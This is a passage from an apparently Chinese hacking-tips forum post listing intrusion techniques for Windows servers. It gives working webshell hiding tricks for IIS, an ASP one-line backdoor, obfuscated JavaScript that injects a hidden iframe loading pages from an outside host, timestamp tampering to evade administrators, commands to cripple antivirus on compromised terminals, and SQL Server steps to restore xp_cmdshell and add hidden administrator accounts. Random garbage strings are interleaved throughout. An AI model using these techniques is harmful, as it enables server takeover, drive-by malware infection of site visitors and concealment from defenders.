用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) N$ X6 x9 Y+ s% J$ v0 Q& F
1 ]3 T9 N2 f+ @$ m5 G' N53、隐藏ASP后门的两种方法, J6 G7 t# P; d" p
1、建立非标准目录:mkdir images..\
& p2 ]; O) P* x) ?拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
& v9 Y* c) K7 |! }通过web访问ASP木马:http://ip/images../news.asp?action=login
% K3 q5 S8 D7 I; f) Q& b; x* Q如何删除非标准目录:rmdir images..\ /s4 {; c% V4 x* a/ J8 Z
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
8 ~4 l+ [0 H4 W t7 M( Qmkdir programme.asp& T+ f4 `' u) ^8 U/ H1 d5 B7 Y0 f8 k
新建1.txt文件内容:<!--#include file=”12.jpg”-->( I; x; F2 W8 i! a
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
k- }5 @) Y6 z1 Hattrib +H +S programme.asp+ V# m/ ` u `- w
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt; L* |, n. p' @' v
+ \+ y6 C! x1 {& }, T t5 x3 a% b3 h: f
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。% z4 w- r% F8 r4 K% ^) Q+ @
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
4 j7 w7 E2 Y" }+ m
+ C5 f h4 x5 g: V/ w# ]55、JS隐蔽挂马0 s+ ]2 n& C2 @
1.
' a, x. e# p7 t* \) Cvar tr4c3="<iframe src=ht";, E- E9 m& f4 Q8 q$ Q1 I( s& ?
tr4c3 = tr4c3+"tp:/";7 M. `" H, E- e% r
tr4c3 = tr4c3+"/ww";, }: Y. Y- K( W* b' P6 H( W
tr4c3 = tr4c3+"w.tr4";& y( \$ F# k) l$ U/ p d
tr4c3 = tr4c3+"c3.com/inc/m";
" [/ O U x \$ H% ^5 j) h* p0 Qtr4c3 = tr4c3+"m.htm style="display:none"></i";8 Z0 |1 j( a# L. b: h- m* x
tr4c3 =tr4c3+"frame>'";
$ H6 n" S* z$ a) Xdocument.write(tr4c3);
$ D8 z* t" S" v8 s避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。* m' Z; M& Q* ]" w5 R6 T$ n/ g) `" m
+ ]! B. V- G$ r4 o1 E0 V2./ t; _9 P5 q7 v: e
转换进制,然后用EVAL执行。如1 Q L0 |+ n. E; @" x
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");! p+ x5 d# M1 T. G
不过这个有点显眼。, ^% Z- t4 e( ?$ O& s
3.
$ e; o& r& ?: a6 e7 R: d ]! {4 bdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
3 ], J' C5 }" u; a8 c* a2 c最后一点,别忘了把文件的时间也修改下。1 v1 K7 A) d* @, H4 `" D
4 N( u8 z9 M3 J, `
56.3389终端入侵常用DOS命令
5 C' f: w, f& w% ?! [taskkill taskkill /PID 1248 /t# A8 K$ R; y5 F1 y/ A8 l4 m' R3 ]
4 m q0 c8 h6 _0 g7 O0 j6 P
tasklist 查进程2 [. Y, f$ L1 A) y8 p h
+ Q( N# P0 T; T- ]8 jcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" r, R2 t# N+ @% i1 G# B
iisreset /reboot
/ x1 v8 _3 c, R& F! ]8 r( G9 otsshutdn /reboot /delay:1 重起服务器
5 t4 q" |. e# ~; E! F% q( f, H% A# L H! K6 O5 E+ W0 J$ }1 a
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,0 C2 _1 ^, | ~+ ?
- {" ~2 _% C! n3 Y5 pquery user 查看当前终端用户在线情况' v9 ?4 K% R( [2 F ?' ^( }
$ a, w$ _$ C. c" x6 f6 q0 B8 K要显示有关所有会话使用的进程的信息,请键入:query process *$ n3 \) V) c8 Y: k0 }, w+ [
# x5 b [6 o3 h要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:26 q+ Y7 K7 l- t9 ^" ?3 B- @
0 R/ d9 E9 W. s p5 H8 ? l) @要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
' M& R+ x. C* ?
, U$ j9 J6 p- C( g) T* g. \要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02" t: S0 o& b) M: _+ U. O7 D F
( Z, l9 i! f# ]命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
9 u( v$ o) Q4 Z' e$ i
% J" l0 ~9 ]0 B1 J) `, l8 Y命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
# S- G" p/ Y6 ^* r" Y. ?8 w4 ^1 Y" H4 ^. }- s1 Q5 [( E+ [5 Y' A/ E6 Y
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。# |+ y5 E) g- F$ j- h# t
7 o; m; ~" k+ F4 M! D9 M0 j) m2 O( r6 M
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
e2 o1 z2 }* z! I* l3 f; a" a
56、在地址栏或按Ctrl+O,输入:
& `( \9 k" r( \2 ]% bjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
# ~- M9 h$ L% N2 M- G
2 f1 l6 B& u s ?5 {源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。' ]8 `6 v: P1 [$ \- K3 c
" C$ R& W7 Z. X/ C9 m
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,9 c3 L: Y" r4 w% H$ Z: j& f
用net localgroup administrators是可以看到管理组下,加了$的用户的。
. E: [" k, @1 z+ V0 D; U5 {9 _2 ?* v R. x+ Y3 D5 H E
58、 sa弱口令相关命令! \* A3 m7 G) u( N
5 K( h( s( } I8 N: r
一.更改sa口令方法:" R1 g) D2 g/ i& g
用sql综合利用工具连接后,执行命令:
0 B1 Y! K9 y+ hexec sp_password NULL,'20001001','sa'0 w/ j$ a* n2 W7 V" p0 g
(提示:慎用!)+ D9 X8 I+ G1 E3 @0 v$ Y
- ~' u' e" F+ ?5 I! J, y
二.简单修补sa弱口令., e3 Q+ y! t* I% P1 I, J" Y, @' B
! V; S A# G t) m h
方法1:查询分离器连接后执行:- [+ `+ {$ L, E9 M; c7 X, n9 F
if exists (select * from
. _+ C! E5 f& E2 H% q: S' |dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
9 J; j# U0 q+ m- P4 K, COBJECTPROPERTY(id, N'IsExtendedProc') = 1); Q) Z* e. M' l7 F- `7 A, X- r
7 l8 R( C# P) z t9 v
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]', M5 G, `: g6 ]1 F* `2 _2 j5 l$ H
1 L l' R, J( V( T9 R; Z/ v
GO
! m) A5 h: W: e) C. a: D: Q2 Q& k4 C* @
然后按F5键命令执行完毕* ~4 t) n& T" @: ?( s
$ _% l9 n) ^4 K! C' i& G方法2:查询分离器连接后' @* |" T+ }7 {0 t: ], n6 x
第一步执行:use master
5 c2 a* V" v: I+ u1 j第二步执行:sp_dropextendedproc 'xp_cmdshell'
5 o; }+ P& X# D% Z3 |然后按F5键命令执行完毕! x ?* S9 \/ D+ e0 o/ ~
4 c* h$ R6 B2 M0 ~- z9 z3 i# c& q" J2 w
三.常见情况恢复执行xp_cmdshell.
`) C3 L( @$ _2 u3 {8 i }; |+ D: z
, V/ l" t& o9 `- f/ e1 未能找到存储过程'master..xpcmdshell'.
; N- Z6 A1 }* G- u 恢复方法:查询分离器连接后,
3 e' f) [7 R/ t第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int* F5 P$ O/ [3 i" Q" c( N
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& R% v6 w! b' v5 i8 y然后按F5键命令执行完毕! Y; V$ f* }7 J* @1 A' N. K
5 }1 U4 ]9 B" h- f& W2 z* H# M2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)- a+ B2 z& |3 Y) Y! B- {' Z
恢复方法:查询分离器连接后,. B8 l3 f; S1 z7 v) N- T! j
第一步执行:sp_dropextendedproc "xp_cmdshell"
) q' ^) X0 Q) a l# C) u3 j5 C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( v O/ {+ k7 h5 }$ g. }
然后按F5键命令执行完毕
7 J% t) B3 I9 b( O0 [1 x/ z: D6 a# m. S8 w# b# p& t/ k
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)' U: f; m; a3 K
恢复方法:查询分离器连接后,
' g, I- Y6 w/ P3 c7 D6 O第一步执行:exec sp_dropextendedproc 'xp_cmdshell'8 p/ h+ ^ @0 P A+ D' h
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' % u* K u& g' N9 d# P. \
然后按F5键命令执行完毕3 M3 K; z1 L" Z" z
3 `7 a. G8 Y. w! Y1 T
四.终极方法.
, H t/ t# I5 w+ e1 {8 @# k如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
- h; @. K$ L. }: Q9 C$ H3 e查询分离器连接后,* T, a& b5 V$ w8 D
2000servser系统:
/ y& {8 s* {& i! q: C# Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'; R6 ]) E! w1 E) C2 A# N
. \' ~4 j7 e9 P: e& Z3 I! {- Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. {" z+ b. ^. Q, }4 e$ E' J2 N( \8 u8 D. n5 i" B
xp或2003server系统:
4 F/ k, M5 j I3 `! b5 ^+ Z: N& x7 c: l( t. _8 y$ I/ t8 s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'* D2 C7 U, ~7 C/ r" E
* F9 G4 l+ X( ^' G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 [% l; \& u* c2 @* q
|
发表于 2012-9-15 14:13:15
收藏
分享
支持
反对